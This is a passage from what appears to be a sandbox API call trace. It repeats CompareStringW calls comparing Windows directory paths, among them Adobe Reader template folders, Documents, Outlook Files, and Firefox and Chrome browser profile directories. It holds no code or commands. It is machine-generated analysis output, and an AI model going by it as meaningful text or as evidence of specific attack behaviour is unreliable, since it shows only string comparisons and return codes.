cchCount2=64) returned 1 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount2=64) returned 1 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount2=64) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount2=64) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount2=64) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount2=64) returned 3 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount2=122) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount2=122) returned 3 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount2=122) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount2=122) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount2=122) returned 3 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", cchCount2=54) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", cchCount2=54) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\", cchCount1=58, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", cchCount2=54) returned 3 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", cchCount2=54) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount1=49, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", cchCount2=54) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 3 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 2 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 3 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", cchCount1=122, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 2 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 3 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 3 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount2=64) returned 3 [0064.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount2=64) returned 3 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount2=64) returned 3 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount2=64) returned 2 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 3 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 3 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 1 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 2 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=46, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 2 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 3 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 1 [0064.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\", cchCount2=64) returned 2 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 3 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 3 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 3 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 1 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 3 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\", cchCount2=64) returned 2 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\", cchCount2=64) returned 3 [0064.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, 